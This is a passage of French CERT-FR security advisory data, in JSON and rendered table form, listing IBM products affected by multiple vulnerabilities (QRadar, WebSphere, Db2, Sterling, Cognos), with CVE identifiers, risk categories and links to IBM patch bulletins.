"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct pour Microsoft Windows versions 6.3.x ant\u00e9rieures \u00e0 6.3.0.6",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct pour Microsoft Windows versions 6.4.x ant\u00e9rieures \u00e0 6.4.0.3",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 Bridge versions ant\u00e9rieures \u00e0 1.1.1",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Command Center versions 10.2.4.1 et 10.2.5 ant\u00e9rieures \u00e0 10.2.5 FP1 IF1",
"product": {
"name": "Cognos Dashboards",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar SIEM versions 7.5.0 ant\u00e9rieures \u00e0 QRadar 7.5.0 UP13 IF01",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Incident Forensics versions 7.5.0 ant\u00e9rieures \u00e0 QIF 7.5.0 UP13 IF01",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Remote Server versions 9.1, 8.0 et 8.5 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Dashboards on Cloud Pak for Data versions 5.x ant\u00e9rieures \u00e0 5.2.1",
"product": {
"name": "Cognos Dashboards",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-6531",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6531"
},
{
"name": "CVE-2025-4447",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4447"
},
{
"name": "CVE-2024-21144",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21144"
},
{
"name": "CVE-2025-24789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24789"
},
{
"name": "CVE-2022-50020",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50020"
},
{
"name": "CVE-2025-47944",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47944"
},
{
"name": "CVE-2024-50349",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50349"
},
{
"name": "CVE-2025-46835",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46835"
},
{
"name": "CVE-2024-57980",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57980"
},
{
"name": "CVE-2024-43420",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43420"
},
{
"name": "CVE-2025-49794",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49794"
},
{
"name": "CVE-2025-22004",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22004"
},
{
"name": "CVE-2025-27614",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27614"
},
{
"name": "CVE-2022-49111",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49111"
},
{
"name": "CVE-2025-1470",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1470"
},
{
"name": "CVE-2022-49058",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49058"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2024-52006",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52006"
},
{
"name": "CVE-2025-4373",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4373"
},
{
"name": "CVE-2024-13009",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-13009"
},
{
"name": "CVE-2025-50106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50106"
},
{
"name": "CVE-2025-48385",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48385"
},
{
"name": "CVE-2025-48060",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48060"
},
{
"name": "CVE-2024-50154",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50154"
},
{
"name": "CVE-2025-27613",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27613"
},
{
"name": "CVE-2025-30754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30754"
},
{
"name": "CVE-2024-10917",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10917"
},
{
"name": "CVE-2022-49136",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49136"
},
{
"name": "CVE-2025-6965",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6965"
},
{
"name": "CVE-2022-49846",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49846"
},
{
"name": "CVE-2019-17543",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-17543"
},
{
"name": "CVE-2025-38086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38086"
},
{
"name": "CVE-2025-48384",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48384"
},
{
"name": "CVE-2025-7783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7783"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2025-1471",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1471"
},
{
"name": "CVE-2025-38079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38079"
},
{
"name": "CVE-2025-20012",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-20012"
},
{
"name": "CVE-2025-7425",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7425"
},
{
"name": "CVE-2025-37738",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37738"
},
{
"name": "CVE-2024-53920",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53920"
},
{
"name": "CVE-2025-48976",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48976"
},
{
"name": "CVE-2025-21587",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21587"
},
{
"name": "CVE-2025-52520",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52520"
},
{
"name": "CVE-2024-52533",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52533"
},
{
"name": "CVE-2024-28956",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28956"
},
{
"name": "CVE-2025-2697",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2697"
},
{
"name": "CVE-2025-47935",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47935"
},
{
"name": "CVE-2025-50059",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50059"
},
{
"name": "CVE-2025-21928",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21928"
},
{
"name": "CVE-2025-30761",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30761"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2025-1494",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1494"
},
{
"name": "CVE-2025-1994",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1994"
},
{
"name": "CVE-2025-52434",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52434"
},
{
"name": "CVE-2025-24495",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24495"
},
{
"name": "CVE-2025-30698",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30698"
},
{
"name": "CVE-2022-49977",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49977"
},
{
"name": "CVE-2024-54661",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-54661"
},
{
"name": "CVE-2025-37890",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37890"
},
{
"name": "CVE-2025-22020",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22020"
},
{
"name": "CVE-2025-27533",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27533"
},
{
"name": "CVE-2025-6021",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6021"
},
{
"name": "CVE-2025-55668",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55668"
},
{
"name": "CVE-2025-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25193"
},
{
"name": "CVE-2024-58002",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58002"
},
{
"name": "CVE-2025-32415",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32415"
},
{
"name": "CVE-2025-21905",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21905"
},
{
"name": "CVE-2024-23337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23337"
},
{
"name": "CVE-2025-30749",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30749"
},
{
"name": "CVE-2025-38052",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38052"
},
{
"name": "CVE-2025-2900",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2900"
},
{
"name": "CVE-2025-53506",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53506"
},
{
"name": "CVE-2019-5427",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-5427"
},
{
"name": "CVE-2022-49788",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49788"
},
{
"name": "CVE-2025-20623",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-20623"
},
{
"name": "CVE-2025-48997",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48997"
},
{
"name": "CVE-2020-5260",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-5260"
},
{
"name": "CVE-2025-49796",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49796"
},
{
"name": "CVE-2025-21919",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21919"
},
{
"name": "CVE-2024-21131",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21131"
},
{
"name": "CVE-2024-34397",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34397"
},
{
"name": "CVE-2025-21991",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21991"
},
{
"name": "CVE-2025-7338",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7338"
},
{
"name": "CVE-2025-24790",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24790"
},
{
"name": "CVE-2024-45332",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45332"
},
{
"name": "CVE-2025-47273",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47273"
},
{
"name": "CVE-2025-23150",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23150"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0746",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-08-29T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-08-28",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243411",
"url": "https://www.ibm.com/support/pages/node/7243411"
},
{
"published_at": "2025-08-22",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7242915",
"url": "https://www.ibm.com/support/pages/node/7242915"
},
{
"published_at": "2025-08-28",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243372",
"url": "https://www.ibm.com/support/pages/node/7243372"
},
{
"published_at": "2025-08-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7242159",
"url": "https://www.ibm.com/support/pages/node/7242159"
},
{
"published_at": "2025-08-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243146",
"url": "https://www.ibm.com/support/pages/node/7243146"
},
{
"published_at": "2025-08-28",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7242161",
"url": "https://www.ibm.com/support/pages/node/7242161"
},
{
"published_at": "2025-08-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243144",
"url": "https://www.ibm.com/support/pages/node/7243144"
},
{
"published_at": "2025-08-25",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243011",
"url": "https://www.ibm.com/support/pages/node/7243011"
},
{
"published_at": "2025-08-28",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7243373",
"url": "https://www.ibm.com/support/pages/node/7243373"
}
]
}
CERTFR-2025-AVI-0760
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | QRadar SIEM | User Entity Behavior Analytics pour IBM QRadar SIEM versions antérieures à 5.0.1 | ||
| IBM | Db2 | Db2 on Cloud Pak for Data versions antérieures à v5.2.1 | ||
| IBM | Db2 | Db2 Warehouse on Cloud Pak for Data versions antérieures à v5.2.1 | ||
| IBM | WebSphere | WebSphere Application Server and WebSphere Application Server Liberty, avec les fonctionnalités jsonp sans le dernier correctif de sécurité | ||
| IBM | WebSphere | IBM Common Licensing pour Websphere Liberty ART versions 9.0.x antérieures à 9.0.0.2 | ||
| IBM | WebSphere | IBM Common Licensing pour Websphere Liberty Agent versions 9.0.x antérieures à 9.0.0.2 | ||
| IBM | WebSphere | WebSphere Hybrid Edition version 5.1 sans les correctifs de sécurité APAR PH67137, APAR PH67132, | ||
| IBM | WebSphere | Cloud Pak for Applications versions 5.1 à 5.3 pour WebSphere Application Server Liberty sans les correctifs de sécurité APAR PH67132 et APAR PH67137 | ||
| IBM | WebSphere | IBM Enterprise Application Runtimes pour WebSphere Application Server version 1.0 sans les correctif de sécurité APAR PH67137 et APAR PH67132 | ||
| IBM | WebSphere | Engineering Test Management versions 7.0.2 et 7.0.3 pour WebSphere Application Server 8.5 et 9.0 sans le dernier correctif de sécurité | ||
| IBM | WebSphere | Engineering Test Management versions 7.1 pour WebSphere Application Server 8.5 et 9.0 sans le dernier correctif de sécurité | ||
| IBM | WebSphere | Engineering Lifecycle Management 7.0.2 et 7.0.3 pour WebSphere Application Server Liberty versions 17.0.0.3 à 25.0.0.8 sans le dernier correctif de sécurité | ||
| IBM | WebSphere | Engineering Lifecycle Management 7.1 pour WebSphere Application Server Liberty versions 17.0.0.3 à 25.0.0.8 sans le dernier correctif de sécurité |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "User Entity Behavior Analytics pour IBM QRadar SIEM versions ant\u00e9rieures \u00e0 5.0.1",
"product": {
"name": "QRadar SIEM",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 on Cloud Pak for Data versions ant\u00e9rieures \u00e0 v5.2.1",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 Warehouse on Cloud Pak for Data versions ant\u00e9rieures \u00e0 v5.2.1",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server and WebSphere Application Server Liberty, avec les fonctionnalit\u00e9s jsonp sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "IBM Common Licensing pour Websphere Liberty ART versions 9.0.x ant\u00e9rieures \u00e0 9.0.0.2",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "IBM Common Licensing pour Websphere Liberty Agent versions 9.0.x ant\u00e9rieures \u00e0 9.0.0.2",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Hybrid Edition version 5.1 sans les correctifs de s\u00e9curit\u00e9 APAR PH67137, APAR PH67132,",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cloud Pak for Applications versions 5.1 \u00e0 5.3 pour WebSphere Application Server Liberty sans les correctifs de s\u00e9curit\u00e9 APAR PH67132 et APAR PH67137",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "IBM Enterprise Application Runtimes pour WebSphere Application Server version 1.0 sans les correctif de s\u00e9curit\u00e9 APAR PH67137 et APAR PH67132",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Engineering Test Management versions 7.0.2 et 7.0.3 pour WebSphere Application Server 8.5 et 9.0 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Engineering Test Management versions 7.1 pour WebSphere Application Server 8.5 et 9.0 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Engineering Lifecycle Management 7.0.2 et 7.0.3 pour WebSphere Application Server Liberty versions 17.0.0.3 \u00e0 25.0.0.8 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Engineering Lifecycle Management 7.1 pour WebSphere Application Server Liberty versions 17.0.0.3 \u00e0 25.0.0.8 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2022-31129",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-31129"
},
{
"name": "CVE-2025-53547",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53547"
},
{
"name": "CVE-2023-43642",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-43642"
},
{
"name": "CVE-2025-0755",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0755"
},
{
"name": "CVE-2025-25724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25724"
},
{
"name": "CVE-2023-1370",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1370"
},
{
"name": "CVE-2025-27516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27516"
},
{
"name": "CVE-2024-55565",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-55565"
},
{
"name": "CVE-2024-51473",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51473"
},
{
"name": "CVE-2015-5237",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-5237"
},
{
"name": "CVE-2025-3445",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3445"
},
{
"name": "CVE-2025-32386",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32386"
},
{
"name": "CVE-2025-46762",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46762"
},
{
"name": "CVE-2025-32421",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32421"
},
{
"name": "CVE-2016-4055",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-4055"
},
{
"name": "CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"name": "CVE-2024-49766",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49766"
},
{
"name": "CVE-2024-45492",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45492"
},
{
"name": "CVE-2025-4330",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4330"
},
{
"name": "CVE-2024-56326",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56326"
},
{
"name": "CVE-2025-22004",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22004"
},
{
"name": "CVE-2025-4138",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4138"
},
{
"name": "CVE-2025-30472",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30472"
},
{
"name": "CVE-2025-24528",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24528"
},
{
"name": "CVE-2024-45813",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45813"
},
{
"name": "CVE-2022-36364",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-36364"
},
{
"name": "CVE-2023-5868",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5868"
},
{
"name": "CVE-2025-48050",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48050"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2025-33092",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-33092"
},
{
"name": "CVE-2024-51479",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51479"
},
{
"name": "CVE-2025-1647",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1647"
},
{
"name": "CVE-2023-39417",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39417"
},
{
"name": "CVE-2023-34462",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34462"
},
{
"name": "CVE-2024-0406",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0406"
},
{
"name": "CVE-2024-11831",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11831"
},
{
"name": "CVE-2018-7489",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-7489"
},
{
"name": "CVE-2025-33143",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-33143"
},
{
"name": "CVE-2021-3393",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3393"
},
{
"name": "CVE-2025-2533",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2533"
},
{
"name": "CVE-2019-10202",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-10202"
},
{
"name": "CVE-2023-5870",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5870"
},
{
"name": "CVE-2024-4067",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4067"
},
{
"name": "CVE-2025-36097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36097"
},
{
"name": "CVE-2024-45490",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45490"
},
{
"name": "CVE-2025-36010",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36010"
},
{
"name": "CVE-2025-36047",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36047"
},
{
"name": "CVE-2024-45491",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45491"
},
{
"name": "CVE-2025-50182",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50182"
},
{
"name": "CVE-2022-49846",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49846"
},
{
"name": "CVE-2025-32462",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32462"
},
{
"name": "CVE-2025-50181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50181"
},
{
"name": "CVE-2022-3510",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3510"
},
{
"name": "CVE-2022-3509",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3509"
},
{
"name": "CVE-2025-4517",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4517"
},
{
"name": "CVE-2023-5869",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5869"
},
{
"name": "CVE-2024-8184",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8184"
},
{
"name": "CVE-2025-48068",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48068"
},
{
"name": "CVE-2024-48949",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-48949"
},
{
"name": "CVE-2025-52999",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52999"
},
{
"name": "CVE-2025-33114",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-33114"
},
{
"name": "CVE-2025-7783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7783"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2022-41862",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41862"
},
{
"name": "CVE-2025-4435",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4435"
},
{
"name": "CVE-2025-21966",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21966"
},
{
"name": "CVE-2023-22467",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22467"
},
{
"name": "CVE-2022-24823",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24823"
},
{
"name": "CVE-2025-22868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22868"
},
{
"name": "CVE-2024-48948",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-48948"
},
{
"name": "CVE-2024-12718",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12718"
},
{
"name": "CVE-2019-9193",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-9193"
},
{
"name": "CVE-2018-5968",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-5968"
},
{
"name": "CVE-2024-6763",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6763"
},
{
"name": "CVE-2025-48976",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48976"
},
{
"name": "CVE-2023-39410",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39410"
},
{
"name": "CVE-2024-56332",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56332"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2025-37799",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37799"
},
{
"name": "CVE-2022-24785",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24785"
},
{
"name": "CVE-2024-56201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56201"
},
{
"name": "CVE-2017-7525",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7525"
},
{
"name": "CVE-2023-26133",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26133"
},
{
"name": "CVE-2024-6484",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6484"
},
{
"name": "CVE-2024-6485",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6485"
},
{
"name": "CVE-2023-2454",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2454"
},
{
"name": "CVE-2024-9823",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-9823"
},
{
"name": "CVE-2025-26791",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-26791"
},
{
"name": "CVE-2024-56339",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56339"
},
{
"name": "CVE-2024-49767",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49767"
},
{
"name": "CVE-2022-1552",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1552"
},
{
"name": "CVE-2024-49828",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49828"
},
{
"name": "CVE-2024-55549",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-55549"
},
{
"name": "CVE-2025-29927",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-29927"
},
{
"name": "CVE-2025-32387",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-32387"
},
{
"name": "CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"name": "CVE-2024-50602",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50602"
},
{
"name": "CVE-2017-18214",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-18214"
},
{
"name": "CVE-2025-22870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
},
{
"name": "CVE-2023-2455",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2455"
},
{
"name": "CVE-2025-24855",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24855"
},
{
"name": "CVE-2025-5702",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5702"
},
{
"name": "CVE-2025-36071",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36071"
},
{
"name": "CVE-2025-37749",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37749"
},
{
"name": "CVE-2024-0985",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0985"
},
{
"name": "CVE-2017-15095",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-15095"
},
